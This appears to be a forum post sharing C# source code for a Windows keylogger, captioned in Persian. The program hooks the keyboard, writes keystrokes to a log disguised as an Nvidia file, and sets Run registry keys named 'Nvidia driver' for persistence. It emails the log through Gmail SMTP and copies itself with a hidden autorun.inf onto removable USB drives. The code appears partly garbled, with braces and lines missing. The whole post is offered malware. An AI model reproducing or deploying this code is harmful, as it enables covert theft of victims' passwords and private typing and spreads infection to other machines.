Title: Keylogger + Email + USB Spread Written in C#
سورس یه کیلار به زبان سی شارپ
using System;
using System.Diagnostics;
using System.Timers;
using System.Windows.Forms;
using System.Runtime.InteropServices;
using System.IO;
using System.Net;
using System.Net.Mail;
using Microsoft.Win32;

namespace Keylogger_V2
    class Program
        private const int WH_KEYBOARD_LL = 13;
        private const int WM_KEYDOWN = 0x0100;
        private static LowLevelKeyboardProc _proc = HookCallback;
        private static IntPtr _hookID = IntPtr.Zero;
        public static string path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),"nvidia.log");
        public static byte caps = 0, shift = 0, failed = 0;

        [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);

        [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool UnhookWindowsHookEx(IntPtr hhk);

        [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);

        [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        private static extern IntPtr GetModuleHandle(string lpModuleName);

        public static void Main()
        _hookID = SetHook(_proc);
        System.Timers.Timer timer;
        timer = new System.Timers.Timer();
        timer.Elapsed += new ElapsedEventHandler(Program.OnTimedEvent);
        timer.AutoReset = true;
        timer.Interval = 600000;
        System.Timers.Timer timer2;
        timer2 = new System.Timers.Timer();
        timer2.Elapsed += new ElapsedEventHandler(Program.USBSpread);
        timer2.AutoReset = true;
        timer2.Interval = 10000;

        public static void startup()
            //Try to copy keylogger in some folders
            string source = Application.ExecutablePath.ToString();
            string destination = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
                System.IO.File.Copy(source, destination,false);
                source = destination;
            } catch {
                Console.WriteLine("No authorization to copy file or other error.");
            //Find if the file already exist in startup
                RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", false);

                if (registryKey.GetValue("Nvidia driver") == null)
                    registryKey.SetValue("Nvidia driver", destination);

                registryKey.Close();//dispose of the Key
            } catch {
                Console.WriteLine("Error setting startup reg key.");
            //Try to add to all users
                RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", false);

                if (registryKey.GetValue("Nvidia driver") == null)
                    registryKey.SetValue("Nvidia driver", source);

                registryKey.Close();//dispose of the key
                Console.WriteLine("Error setting startup reg key for all users.");

        public static void OnTimedEvent(object source, EventArgs e)
            Process[] ProcessList = Process.GetProcesses();
            foreach (Process proc in ProcessList)
                if (proc.MainWindowTitle.Contains("Taskmgr.exe"))
            System.Net.Mail.MailMessage msg = new System.Net.Mail.MailMessage(); //create the message
            msg.To.Add("[email protected]");
            msg.From = new MailAddress("[email protected]", "username", System.Text.Encoding.UTF8);
            msg.Subject = "i don't know";
            msg.SubjectEncoding = System.Text.Encoding.UTF8;
            msg.Body = "ciao ale";
            msg.BodyEncoding = System.Text.Encoding.UTF8;
            msg.IsBodyHtml = false;
            msg.Priority = MailPriority.High;
            SmtpClient client = new SmtpClient(); //Network Credentials for Gmail
            client.Credentials = new System.Net.NetworkCredential("[email protected]", "password");
            client.Port = 587;
            client.Host = "smtp.gmail.com";
            client.EnableSsl = true;
            Attachment data = new Attachment(Program.path);
                failed = 0;
                failed = 1;

            if (failed == 0)
                File.WriteAllText(Program.path, ""); //empties the file
            failed = 0;

        private static IntPtr SetHook(LowLevelKeyboardProc proc)
            using (Process curProcess = Process.GetCurrentProcess())
            using (ProcessModule curModule = curProcess.MainModule)
                return SetWindowsHookEx(WH_KEYBOARD_LL, proc, GetModuleHandle(curModule.ModuleName), 0);
        private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
        private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
            if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
                StreamWriter sw = File.AppendText(Program.path);
                int vkCode = Marshal.ReadInt32(lParam);
                if (Keys.Shift == Control.ModifierKeys) Program.shift = 1;
            switch ((Keys)vkCode)
                    case Keys.Space:
                        sw.Write(" ");
                    case Keys.Return:
                    case Keys.Back:
                    case Keys.Tab:
                    case Keys.D0:
                        if (Program.shift == 0) sw.Write("0");
                        else sw.Write(")");
                    case Keys.D1:
                        if (Program.shift == 0) sw.Write("1");
                        else sw.Write("!");
                    case Keys.D2:
                        if (Program.shift == 0) sw.Write("2");
                        else sw.Write("@");
                    case Keys.D3:
                        if (Program.shift == 0) sw.Write("3");
                        else sw.Write("#");
                    case Keys.D4:
                        if (Program.shift == 0) sw.Write("4");
                        else sw.Write("$");
                    case Keys.D5:
                        if (Program.shift == 0) sw.Write("5");
                        else sw.Write("%");
                    case Keys.D6:
                        if (Program.shift == 0) sw.Write("6");
                        else sw.Write("^");
                    case Keys.D7:
                        if (Program.shift == 0) sw.Write("7");
                        else sw.Write("&");
                    case Keys.D8:
                        if (Program.shift == 0) sw.Write("8");
                        else sw.Write("*");
                    case Keys.D9:
                        if (Program.shift == 0) sw.Write("9");
                        else sw.Write("(");
                    case Keys.LShiftKey:
                    case Keys.RShiftKey:
                    case Keys.LControlKey:
                    case Keys.RControlKey:
                    case Keys.LMenu:
                    case Keys.RMenu:
                    case Keys.LWin:
                    case Keys.RWin:
                    case Keys.Apps:
                    case Keys.OemQuestion:
                        if (Program.shift == 0) sw.Write("/");
                        else sw.Write("?");
                    case Keys.OemOpenBrackets:
                        if (Program.shift == 0) sw.Write("[");
                        else sw.Write("{");
                    case Keys.OemCloseBrackets:
                        if (Program.shift == 0) sw.Write("]");
                        else sw.Write("}");
                    case Keys.Oem1:
                        if (Program.shift == 0) sw.Write(";");
                        else sw.Write(":");
                    case Keys.Oem7:
                        if (Program.shift == 0) sw.Write("'");
                        else sw.Write('"');
                    case Keys.Oemcomma:
                        if (Program.shift == 0) sw.Write(",");
                        else sw.Write("<");
                    case Keys.OemPeriod:
                        if (Program.shift == 0) sw.Write(".");
                        else sw.Write(">");
                    case Keys.OemMinus:
                        if (Program.shift == 0) sw.Write("-");
                        else sw.Write("_");
                    case Keys.Oemplus:
                        if (Program.shift == 0) sw.Write("=");
                        else sw.Write("+");
                    case Keys.Oemtilde:
                        if (Program.shift == 0) sw.Write("`");
                        else sw.Write("~");
                case Keys.Oem5:
                case Keys.Capital:
                    if (Program.caps == 0) Program.caps = 1;
                    else Program.caps = 0;
                    if (Program.shift == 0 && Program.caps == 0) sw.Write(((Keys)vkCode).ToString().ToLower());
                    if (Program.shift == 1 && Program.caps == 0) sw.Write(((Keys)vkCode).ToString().ToUpper());
                    if (Program.shift == 0 && Program.caps == 1) sw.Write(((Keys)vkCode).ToString().ToUpper());
                    if (Program.shift == 1 && Program.caps == 1) sw.Write(((Keys)vkCode).ToString().ToLower());
            Program.shift = 0;
        return CallNextHookEx(_hookID, nCode, wParam, lParam);

        public static void USBSpread(object source, EventArgs e)
            /////////////////////// USB spread class //////////////////////
            //A bit modified
            string source2 = Application.ExecutablePath.ToString();
            System.IO.DriveInfo[] drives = System.IO.DriveInfo.GetDrives();
                foreach (System.IO.DriveInfo drive in drives)
                    if (drive.DriveType == DriveType.Removable)
                        string driveAutorun = drive.Name + "autorun.inf";
                        StreamWriter sw = new StreamWriter(driveAutorun);
                        sw.WriteLine("action=Run VMCLite");
                        File.SetAttributes(drive.Name + "autorun.inf", File.GetAttributes(drive.Name + "autorun.inf") | FileAttributes.Hidden);
                            File.Copy(source2, drive.Name + "start.exe", true);
                            File.SetAttributes(drive.Name + "start.exe", File.GetAttributes(drive.Name + "start.exe") | FileAttributes.Hidden);
                            Console.WriteLine("Removable device rooted");
            catch (Exception e2)
گروه دور همی پارسی کدرز

